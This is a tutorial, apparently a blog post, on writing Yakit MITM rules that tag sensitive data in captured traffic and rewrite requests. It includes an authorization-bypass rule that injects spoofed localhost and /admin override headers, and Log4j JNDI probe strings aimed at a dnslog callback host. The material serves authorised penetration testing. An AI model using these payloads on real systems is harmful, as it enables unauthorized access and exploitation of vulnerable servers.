Yakit Customization
Common Yakit features
Basic usage of Yakit
One-diagram summary of the commonly used Yakit features

Yakit capture rules
In Yakit's MITM module you can configure rules to improve the packet-capture experience.
A rule matches content inside a packet (for example upload, ID-card numbers, phone numbers) and colour-codes the packet, so you can quickly locate packets that may carry a security weakness instead of reading every one.
Effect
After capturing, packets can be found by their tags and colour.

Once you have found a packet, the matched field values can be inspected quickly on the right-hand side (bottom right of the figure below).

You can also rewrite the User-Agent header so that, while proxying, a marker such as src white hat follows your normal UA string, identifying you to the target's operators.
How to configure
In MITM, open the rule settings and edit the rule content:

The ExtraTag values are shown in the History list, while the rule name (VerboseName) appears in the right-hand panel once you click a packet. Rules are matched from top to bottom, and the packet is coloured with the colour of the last rule that matched.

After configuring, be sure to click Save.
Rules can also be imported from JSON, for example the official rule set (click "use default configuration" in the import dialog to obtain it).
Below are two rule files of my own.
The first colours packets by keyword, the second rewrites the UA header.
Keyword colouring
Keyword-colouring rules (JSON):
[
{
"Rule": "(?i)path.{10}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 1,
"ExtraTag": [
"关键字"
],
"VerboseName": "关键字path"
},
{
"Rule": "(?i)select.{10}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 2,
"ExtraTag": [
"关键字"
],
"VerboseName": "关键字select"
},
{
"Rule": "(.{7}(?i)key.{10})",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 3,
"ExtraTag": [
"关键字"
],
"VerboseName": "关键字key"
},
{
"Rule": "(?i)config.{10}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 4,
"ExtraTag": [
"关键字"
],
"VerboseName": "关键字config"
},
{
"Rule": "(?i)phone",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 5,
"ExtraTag": [
"关键字"
],
"VerboseName": "关键字phone"
},
{
"Rule": "[a-zA-Z0-9.-]+\\.baidu\\.com",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 6,
"ExtraTag": [
"子域名"
],
"Disabled": true,
"VerboseName": "子域名(要自己修改)"
},
{
"Rule": "(?i)api.{7}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"EnableForURI": true,
"Index": 7,
"ExtraTag": [
"api"
],
"VerboseName": "api"
},
{
"Rule": "((127\\.0\\.0\\.1)|(localhost)|(10\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})|(172\\.((1[6-9])|(2\\d)|(3[01]))\\.\\d{1,3}\\.\\d{1,3})|(192\\.168\\.\\d{1,3}\\.\\d{1,3}))",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"EnableForURI": true,
"Index": 8,
"ExtraTag": [
"IP"
],
"VerboseName": "内网ip"
},
{
"Rule": "(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"EnableForURI": true,
"Index": 9,
"ExtraTag": [
"IP"
],
"VerboseName": "IP"
},
{
"Rule": "(?i)(https|http)://[-A-Za-z0-9+\u0026@#/%?=~_|!:,.;]+[-A-Za-z0-9+\u0026@#/%=~_|]",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"Index": 10,
"ExtraTag": [
"URL"
],
"VerboseName": "url"
},
{
"Rule": "(ftp|file)://[-A-Za-z0-9+\u0026@#/%?=~_|!:,.;]+[-A-Za-z0-9+\u0026@#/%=~_|]",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 11,
"ExtraTag": [
"file"
],
"VerboseName": "file"
},
{
"Rule": "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 12,
"ExtraTag": [
"邮箱"
],
"VerboseName": "邮箱"
},
{
"Rule": "(?i)upload.{7}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 13,
"ExtraTag": [
"上传下载"
],
"VerboseName": "上传下载"
},
{
"Rule": "(?i)download.{7}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 14,
"ExtraTag": [
"上传下载"
],
"VerboseName": "上传下载"
},
{
"Rule": "\\D1[3456789]\\d{9}\\D",
"NoReplace": true,
"Color": "purple",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 15,
"ExtraTag": [
"手机号"
],
"VerboseName": "手机号"
},
{
"Rule": "([1-9]\\d{5}(18|19|20)\\d{2}((0[1-9])|(10|11|12))(([0-2][1-9])|10|20|30|31)\\d{3}[0-9Xx][^\\d])",
"NoReplace": true,
"Color": "purple",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 16,
"ExtraTag": [
"身份证"
],
"VerboseName": "身份证"
},
{
"Rule": "(?i)(nginx|tomcat|weblogic|apache|jboss|websphere|iis)[/ ]?[0-9][0-9.]*",
"NoReplace": true,
"Color": "orange",
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"Index": 17,
"ExtraTag": [
"中间件"
],
"VerboseName": "中间件版本"
},
{
"Rule": "Access-Control-Allow-Methods.*(DELETE|SEARCH|COPY|MOVE|PROPFIND|PROPPATCH|MKCOL|LOCK|UNLOCK|PUT|OPTIONS|TRACE|TRACK|HEAD)",
"NoReplace": true,
"Color": "orange",
"EnableForResponse": true,
"EnableForHeader": true,
"Index": 18,
"ExtraTag": [
"低危"
],
"VerboseName": "低危"
},
{
"Rule": "((.{3}(?i)AccessKey.{10})|(.{3}(?i)Access Key.{10}))",
"NoReplace": true,
"Color": "yellow",
"EnableForRequest": true,
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"EnableForURI": true,
"Index": 19,
"ExtraTag": [
"Access Key"
],
"VerboseName": "Access Key"
},
{
"Rule": "(?i)(file=|filename=|path=|download=|upload=|fileid=|file_id=|url=|uri=|redirect=|forward=)",
"NoReplace": true,
"Color": "green",
"EnableForRequest": true,
"EnableForResponse": true,
"EnableForURI": true,
"Index": 20,
"ExtraTag": [
"路径参数"
],
"VerboseName": "路径类敏感参数"
},
{
"Rule": "(?i)(select|order by|insert|where|update)",
"NoReplace": true,
"Color": "green",
"EnableForRequest": true,
"EnableForResponse": true,
"EnableForURI": true,
"Index": 21,
"ExtraTag": [
"sql参数"
],
"VerboseName": "sql参数(GET)"
},
{
"Rule": "(?i)power(ed)? by",
"NoReplace": true,
"Color": "green",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 22,
"ExtraTag": [
"power by信息"
],
"VerboseName": "powerby信息"
},
{
"Rule": "((.{3}(?i)secretKey.{10})|(.{3}(?i)Secret Key.{10}))",
"NoReplace": true,
"Color": "red",
"EnableForRequest": true,
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"EnableForURI": true,
"Index": 23,
"ExtraTag": [
"Secret Key"
],
"VerboseName": "Secret Key"
}
]
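To check a rule file like the one above before importing it, and to see how top-to-bottom, last-colour-wins evaluation plays out, here is an added Go example; it is not Yakit's own code. It assumes Yakit evaluates Rule with Go's regexp package (RE2 syntax, since Yakit is written in Go) and that the EnableFor* flags simply select which part of the message a pattern is tested against. The MITMRule struct, LoadRules, Match and the sample response are constructed for this illustration. Three rules from the list above are embedded, with the middleware pattern written to accept the "/" in a Server header such as nginx/1.18.0.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"sort"
)

// MITMRule mirrors the keys used in the JSON rule files on this page.
// Only the fields the simulator needs are listed; unknown keys are ignored.
type MITMRule struct {
	Rule              string   `json:"Rule"`
	NoReplace         bool     `json:"NoReplace"`
	Color             string   `json:"Color"`
	EnableForRequest  bool     `json:"EnableForRequest"`
	EnableForResponse bool     `json:"EnableForResponse"`
	EnableForHeader   bool     `json:"EnableForHeader"`
	EnableForBody     bool     `json:"EnableForBody"`
	EnableForURI      bool     `json:"EnableForURI"`
	Index             int      `json:"Index"`
	ExtraTag          []string `json:"ExtraTag"`
	Disabled          bool     `json:"Disabled"`
	VerboseName       string   `json:"VerboseName"`
	re                *regexp.Regexp // compiled form of Rule
}

// LoadRules parses a rule file, drops disabled rules, compiles every Rule
// with Go's regexp (RE2 syntax; assumed to be what Yakit uses) and sorts by
// Index, the top-to-bottom order the MITM UI evaluates rules in. A pattern
// RE2 rejects (lookaround, backreferences) fails the whole load, which is
// the check you want before importing a file copied from another tool.
func LoadRules(jsonText string) ([]MITMRule, error) {
	var parsed []MITMRule
	if err := json.Unmarshal([]byte(jsonText), &parsed); err != nil {
		return nil, err
	}
	rules := make([]MITMRule, 0, len(parsed))
	for _, r := range parsed {
		if r.Disabled {
			continue
		}
		re, err := regexp.Compile(r.Rule)
		if err != nil {
			return nil, fmt.Errorf("rule %q: %w", r.VerboseName, err)
		}
		r.re = re
		rules = append(rules, r)
	}
	sort.SliceStable(rules, func(i, j int) bool { return rules[i].Index < rules[j].Index })
	return rules, nil
}

// Match runs the rules over one message split into URI, header block and
// body. It returns the ExtraTags that fired (rule order, de-duplicated) and
// the final colour: rules are checked top to bottom and the last matching
// rule's colour wins. Which parts a rule is tested against follows its
// EnableFor* flags (assumed semantics).
func Match(rules []MITMRule, isRequest bool, uri, header, body string) ([]string, string) {
	var tags []string
	color := ""
	seen := map[string]bool{}
	for _, r := range rules {
		if (isRequest && !r.EnableForRequest) || (!isRequest && !r.EnableForResponse) {
			continue
		}
		hit := (r.EnableForURI && r.re.MatchString(uri)) ||
			(r.EnableForHeader && r.re.MatchString(header)) ||
			(r.EnableForBody && r.re.MatchString(body))
		if !hit {
			continue
		}
		if r.Color != "" {
			color = r.Color
		}
		for _, t := range r.ExtraTag {
			if !seen[t] {
				seen[t] = true
				tags = append(tags, t)
			}
		}
	}
	return tags, color
}

// Constructed sample rule file: three rules from the list above.
const sampleRules = `[
 {"Rule":"\\D1[3456789]\\d{9}\\D","NoReplace":true,"Color":"purple",
  "EnableForResponse":true,"EnableForBody":true,"Index":15,
  "ExtraTag":["手机号"],"VerboseName":"手机号"},
 {"Rule":"(?i)(nginx|tomcat|weblogic|apache|jboss|websphere|iis)[/ ]?[0-9][0-9.]*",
  "NoReplace":true,"Color":"orange","EnableForResponse":true,"EnableForHeader":true,
  "EnableForBody":true,"Index":17,"ExtraTag":["中间件"],"VerboseName":"中间件版本"},
 {"Rule":"((.{3}(?i)secretKey.{10})|(.{3}(?i)Secret Key.{10}))","NoReplace":true,
  "Color":"red","EnableForRequest":true,"EnableForResponse":true,"EnableForHeader":true,
  "EnableForBody":true,"EnableForURI":true,"Index":23,
  "ExtraTag":["Secret Key"],"VerboseName":"Secret Key"}
]`

// Constructed sample response, already split into the three parts.
const (
	sampleURI    = "/api/user/profile"
	sampleHeader = "HTTP/1.1 200 OK\r\nServer: nginx/1.18.0\r\nContent-Type: application/json\r\n"
	sampleBody   = `{"phone":"13812345678","secretKey":"dummy-secret-0000"}`
)

func main() {
	rules, err := LoadRules(sampleRules)
	if err != nil {
		panic(err)
	}
	tags, color := Match(rules, false, sampleURI, sampleHeader, sampleBody)
	fmt.Printf("tags=%v colour=%s\n", tags, color)
}
```

Run it with go run: the sample response is tagged 手机号, 中间件 and Secret Key and coloured red, because the Secret Key rule has the highest Index and therefore matches last. Feeding LoadRules a pattern with a lookahead such as (?=foo)bar fails at compile time, which is the kind of Perl-style regex a Go-based engine will not accept.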
Automatic UA replacement
UA replacement rule (JSON):
Remember to set the value to your own browser's UA followed by a marker; keeping the real UA in front avoids compatibility problems with sites that sniff it.
[
{
"Rule": "HTTP",
"EnableForRequest": true,
"EnableForHeader": true,
"Index": 1,
"VerboseName": "替换UA(自行修改UA)",
"ExtraHeaders": [
{
"Header": "User-Agent",
"Value": "【the UA to use, e.g. firefox100.0 white hat】"
}
]
}
]
Automatically adding authorization-bypass headers
Authorization-bypass header rule (JSON). Note that it rewrites every proxied request, so keep it disabled unless you are specifically testing IP- or path-based access control; a target that does not trust these headers simply ignores them, but the extra headers show up in every log.
[
{
"Rule": "HTTP",
"EnableForRequest": true,
"EnableForHeader": true,
"Index": 1,
"VerboseName": "权限绕过",
"ExtraHeaders": [
{
"Header": "Client-IP",
"Value": "127.0.0.1"
},
{
"Header": "Forwarded-For-Ip",
"Value": "127.0.0.1"
},
{
"Header": "Forwarded-For",
"Value": "127.0.0.1"
},
{
"Header": "Forwarded",
"Value": "127.0.0.1"
},
{
"Header": "True-Client-IP",
"Value": "127.0.0.1"
},
{
"Header": "X-Client-IP",
"Value": "127.0.0.1"
},
{
"Header": "X-Custom-IP-Authorization",
"Value": "127.0.0.1"
},
{
"Header": "X-Forward-For",
"Value": "127.0.0.1"
},
{
"Header": "X-Forward",
"Value": "127.0.0.1"
},
{
"Header": "X-Forwarded-By",
"Value": "127.0.0.1"
},
{
"Header": "X-Forwarded-For-Original",
"Value": "127.0.0.1"
},
{
"Header": "X-Forwarded-For",
"Value": "127.0.0.1"
},
{
"Header": "X-Forwarded-Server",
"Value": "127.0.0.1"
},
{
"Header": "X-Forwarded",
"Value": "127.0.0.1"
},
{
"Header": "X-Forwarded-Host",
"Value": "127.0.0.1"
},
{
"Header": "X-Host",
"Value": "127.0.0.1"
},
{
"Header": "X-HTTP-Host-Override",
"Value": "127.0.0.1"
},
{
"Header": "X-Originating-IP",
"Value": "127.0.0.1"
},
{
"Header": "X-Real-IP",
"Value": "127.0.0.1"
},
{
"Header": "X-Remote-Addr",
"Value": "127.0.0.1"
},
{
"Header": "X-Remote-IP",
"Value": "127.0.0.1"
},
{
"Header": "X-Original-URL",
"Value": "/admin"
},
{
"Header": "X-Override-URL",
"Value": "/admin"
},
{
"Header": "X-Rewrite-URL",
"Value": "/admin"
},
{
"Header": "Referer",
"Value": "/admin"
}
]
}
]
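The UA rule above and the bypass list both work through ExtraHeaders. This added Go example, which is not Yakit's code, shows what such a rule does to the raw request bytes: a header the browser already sends, such as User-Agent or an upstream X-Forwarded-For, is rewritten in place and the rest are appended, so the proxied request never carries two copies. Replace-rather-than-duplicate is an assumption about Yakit's behaviour; the sample request, the header subset and the helper names are constructed for this illustration.

```go
package main

import (
	"fmt"
	"strings"
)

// ExtraHeader is one entry of an ExtraHeaders list in a Yakit rule.
type ExtraHeader struct {
	Header string
	Value  string
}

// InjectHeaders applies ExtraHeaders entries to a raw HTTP/1.1 request.
// Header names are compared case-insensitively; a header the request
// already carries is rewritten in place, anything else is appended before
// the blank line, and the body passes through untouched. (Replace-not-
// duplicate is assumed behaviour; it is what lets the UA rule work when
// the browser already sends a User-Agent.)
func InjectHeaders(raw string, extra []ExtraHeader) string {
	head, body, _ := strings.Cut(raw, "\r\n\r\n")
	lines := strings.Split(head, "\r\n") // lines[0] is the request line
	for _, h := range extra {
		replaced := false
		for i := 1; i < len(lines); i++ {
			name, _, ok := strings.Cut(lines[i], ":")
			if ok && strings.EqualFold(strings.TrimSpace(name), h.Header) {
				lines[i] = h.Header + ": " + h.Value
				replaced = true
			}
		}
		if !replaced {
			lines = append(lines, h.Header+": "+h.Value)
		}
	}
	return strings.Join(lines, "\r\n") + "\r\n\r\n" + body
}

// CountHeader returns how many times a header name occurs in a raw request,
// the quick check that injection did not create duplicates.
func CountHeader(raw string, name string) int {
	head, _, _ := strings.Cut(raw, "\r\n\r\n")
	n := 0
	for _, line := range strings.Split(head, "\r\n")[1:] {
		if key, _, ok := strings.Cut(line, ":"); ok && strings.EqualFold(strings.TrimSpace(key), name) {
			n++
		}
	}
	return n
}

// Constructed sample: a subset of the bypass list plus the UA marker rule.
var sampleExtra = []ExtraHeader{
	{"X-Forwarded-For", "127.0.0.1"},
	{"X-Real-IP", "127.0.0.1"},
	{"X-Original-URL", "/admin"},
	{"User-Agent", "Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 src white hat"},
}

// Constructed sample request; it already carries a UA and an X-Forwarded-For.
const sampleRequest = "GET /admin/users HTTP/1.1\r\n" +
	"Host: target.example\r\n" +
	"User-Agent: curl/8.0.1\r\n" +
	"X-Forwarded-For: 203.0.113.9\r\n" +
	"\r\n"

func main() {
	fmt.Print(InjectHeaders(sampleRequest, sampleExtra))
}
```

Diffing the output against sampleRequest is the same check you would do in Yakit's History after enabling the rule: the request line and Host are unchanged, the existing User-Agent and X-Forwarded-For now carry the injected values, and X-Real-IP and X-Original-URL are appended exactly once.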
Other tricks
Log4j and subdomain-collection rules (JSON)
- Log4j probing in header positions
- Subdomain collection
Both need editing before import: fill in your target domain and your dnslog address.
[
{
"Rule": "[a-zA-Z0-9.-]+\\.【target domain】",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 1,
"ExtraTag": [
"子域名"
],
"VerboseName": "子域名(要自己修改)"
},
{
"Rule": "HTTP",
"EnableForRequest": true,
"EnableForHeader": true,
"Index": 2,
"VerboseName": "log4j头部检测(自行修改dnslog)",
"ExtraHeaders": [
{
"Header": "User-Agent",
"Value": "${jndi:dns://【your dnslog】}"
},
{
"Header": "X-Forwarded-For",
"Value": "${jndi:dns://【your dnslog】}"
},
{
"Header": "From",
"Value": "${jndi:dns://【your dnslog】}"
},
{
"Header": "Origin",
"Value": "${jndi:dns://【your dnslog】}"
}
],
"ExtraRepeat": true
}
]
Maintaining your own wordlists
Setup
Click Payload in the top-right corner

Insert your own wordlist

Then, in Web Fuzzer, mark the payload as a frequently used tag; from then on a captured request can be brute-forced directly with your wordlist.
Effect

Trust the country, trust the Party; hackers come to no good end.
Please comply with applicable laws and regulations. The techniques in this article are intended only for authorised security testing; using them for illegal activity is prohibited!
This article is intended only for penetration testers holding legal authorisation and for network operators performing routine work.
While operating, you must ensure that all of your actions comply with local laws and regulations and do not violate the laws of the People's Republic of China.
The author accepts no liability for any illegal activity arising from a user's unauthorised use of these techniques.
